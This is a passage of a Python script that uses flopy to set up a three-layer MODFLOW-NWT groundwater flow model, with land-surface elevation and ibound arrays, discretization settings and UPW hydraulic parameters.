0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.15E+02, 2.17E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.46E+02, 2.48E+02, 2.48E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.79E+02, 2.88E+02, 2.96E+02, 3.03E+02, 3.03E+02, 3.10E+02, 3.10E+02, 3.11E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.51E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.79E+02, 2.79E+02, 2.91E+02, 2.96E+02, 2.96E+02, 3.03E+02, 3.10E+02, 3.10E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.48E+02, 2.50E+02, 2.51E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.72E+02, 2.75E+02, 2.79E+02, 2.80E+02, 2.91E+02, 2.91E+02, 2.96E+02, 2.96E+02, 2.96E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.50E+02, 2.50E+02, 2.53E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.79E+02, 2.79E+02, 2.80E+02, 2.88E+02, 2.91E+02, 2.91E+02, 2.91E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.37E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.72E+02, 2.75E+02, 2.79E+02, 2.79E+02, 2.79E+02, 2.81E+02, 2.88E+02, 2.88E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.935360E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.43E+02, 2.43E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.53E+02, 2.59E+02, 2.63E+02, 2.63E+02, 2.67E+02, 2.72E+02, 2.75E+02, 2.75E+02, 2.79E+02, 2.79E+02, 2.79E+02, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.937070E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.35E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.67E+02, 2.72E+02, 2.73E+02, 2.75E+02, 2.75E+02, 2.75E+02, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.938565E+02, 1.94E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.53E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.67E+02, 2.68E+02, 2.72E+02, 2.73E+02, 2.73E+02, 2.73E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.19E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.51E+02, 2.53E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.67E+02, 2.67E+02, 2.69E+02, 2.72E+02, 2.72E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.19E+02, 2.21E+02, 2.22E+02, 2.24E+02, 2.25E+02, 2.28E+02, 2.28E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.63E+02, 2.67E+02, 2.67E+02, 0, 0, 0, 0,
1.930262E+02, 1.930813E+02, 1.931463E+02, 1.932345E+02, 1.933725E+02, 1.938515E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.21E+02, 2.22E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.52E+02, 2.54E+02, 2.59E+02, 2.59E+02, 2.63E+02, 2.63E+02, 0, 0, 0, 0, 0,
1.930745E+02, 1.932300E+02, 1.934108E+02, 1.936452E+02, 1.939805E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.22E+02, 2.23E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.35E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.51E+02, 2.54E+02, 2.59E+02, 2.59E+02, 0, 0, 0, 0, 0, 0,
1.931133E+02, 1.933483E+02, 1.936155E+02, 1.939447E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.28E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.48E+02, 2.50E+02, 2.50E+02, 2.50E+02, 2.58E+02, 0, 0, 0, 0, 0, 0, 0,
1.931405E+02, 1.934308E+02, 1.937560E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.32E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.46E+02, 2.48E+02, 2.48E+02, 0, 0, 0, 0, 0, 0, 0, 0,
1.931537E+02, 1.934730E+02, 1.938313E+02, 1.94E+02, 1.947535E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.22E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.28E+02, 2.28E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.43E+02, 2.43E+02, 2.43E+02, 2.46E+02, 2.46E+02, 0, 0, 0, 0, 0, 0, 0, 0,
1.931505E+02, 1.934700E+02, 1.938398E+02, 1.94E+02, 1.947937E+02, 1.95E+02, 1.96E+02, 1.968170E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.41E+02, 2.43E+02, 2.43E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1.931243E+02, 1.934108E+02, 1.937765E+02, 1.94E+02, 1.947485E+02, 1.95E+02, 1.96E+02, 1.967558E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.41E+02, 2.41E+02, 2.41E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1.93E+02, 1.932635E+02, 1.936290E+02, 1.94E+02, 1.946230E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.36E+02, 2.39E+02, 2.39E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1.93E+02, 1.933783E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.957018E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.34E+02, 2.35E+02, 2.35E+02, 2.35E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1.93E+02, 1.935405E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.14E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.32E+02, 2.34E+02, 2.34E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1.932890E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.99E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.31E+02, 2.31E+02, 2.31E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1.93E+02, 1.935508E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.97E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.28E+02, 2.28E+02, 2.28E+02, 2.30E+02, 2.30E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1.932863E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.98E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.27E+02, 2.28E+02, 2.28E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1.93E+02, 1.935100E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.25E+02, 2.25E+02, 2.25E+02, 2.27E+02, 2.27E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1.932413E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.24E+02, 2.25E+02, 2.25E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1.93E+02, 1.933477E+02, 1.94E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.15E+02, 2.16E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.22E+02, 2.22E+02, 2.23E+02, 2.24E+02, 2.24E+02, 2.24E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1.93E+02, 1.932182E+02, 1.933268E+02, 1.94E+02, 1.94E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.21E+02, 2.22E+02, 2.23E+02, 2.23E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.93E+02, 1.93E+02, 1.93E+02, 1.93E+02, 1.93E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.21E+02, 2.22E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.16E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 2.21E+02, 2.21E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.17E+02, 2.18E+02, 2.18E+02, 2.19E+02, 2.20E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.17E+02, 2.18E+02, 2.18E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.936795E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.15E+02, 2.15E+02, 2.16E+02, 2.17E+02, 2.17E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.938033E+02, 1.94E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.14E+02, 2.14E+02, 2.15E+02, 2.16E+02, 2.16E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.938665E+02, 1.94E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.13E+02, 2.14E+02, 2.14E+02, 2.15E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.94E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 2.11E+02, 2.12E+02, 2.13E+02, 2.13E+02, 2.14E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.933480E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 1.99E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.107930E+02, 2.11E+02, 2.12E+02, 2.13E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
top1 = top1.reshape((nrow,ncol))
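# Three flat-bottomed layers beneath the irregular land surface (top1):
# bottoms at 180 m, 160 m and 140 m (lenuni=2, meters).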
bot1 = np.ones(top1.shape) * 180.
bot2 = np.ones(top1.shape) * 160.
bot3 = np.ones(top1.shape) * 140.
botm = [bot1, bot2, bot3]
botm = np.array(botm)
# Stress periods
Steady = True
nstp = 1
tsmult = 1.
perlen = 86400.
# Create the discretization object
# itmuni = 4 (days); lenuni = 2 (meters)
dis = flopy.modflow.ModflowDis(mf, nlay, nrow, ncol, nper=1, delr=delr, delc=delc,
top=top1, botm=botm, laycbd=0, itmuni=4, lenuni=2,
steady=Steady, nstp=nstp, tsmult=tsmult, perlen=perlen)

## Instantiate upstream weighting (UPW) flow package for MODFLOW-NWT
# UPW parameters
# UPW must be instantiated after DIS. Otherwise, during the mf.write_input() procedures,
# flopy will crash.
# First line of UPW input is: IUPWCB HDRY NPUPW IPHDRY
hdry = -1.e+30
iphdry = 0
# Next variables are: LAYTYP, LAYAVG, CHANI, LAYVKA, LAYWET
laytyp = [1, 1, 1] # >0: convertible
layavg = 0 # 0: harmonic mean
chani = 1.0 # >0: CHANI is the horizontal anisotropy for the entire layer
layvka = 0 # =0: indicates VKA is vertical hydraulic conductivity
laywet = 0 # Always set equal to zero in UPW package
hk = 3.172E-03
# hani = 1 # Not needed because CHANI > 0
vka = 3.172E-04 # Is equal to vert. K b/c LAYVKA = 0
ss = 0.00001
sy = 0.30
upw = flopy.modflow.ModflowUpw(mf, laytyp=laytyp, layavg=layavg, chani=chani, layvka=layvka,
laywet=laywet, ipakcb=53, hdry=hdry, iphdry=iphdry, hk=hk,
vka=vka, ss=ss, sy=sy)

## Instantiate basic (BAS or BA6) package for MODFLOW-NWT
ibnd1 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
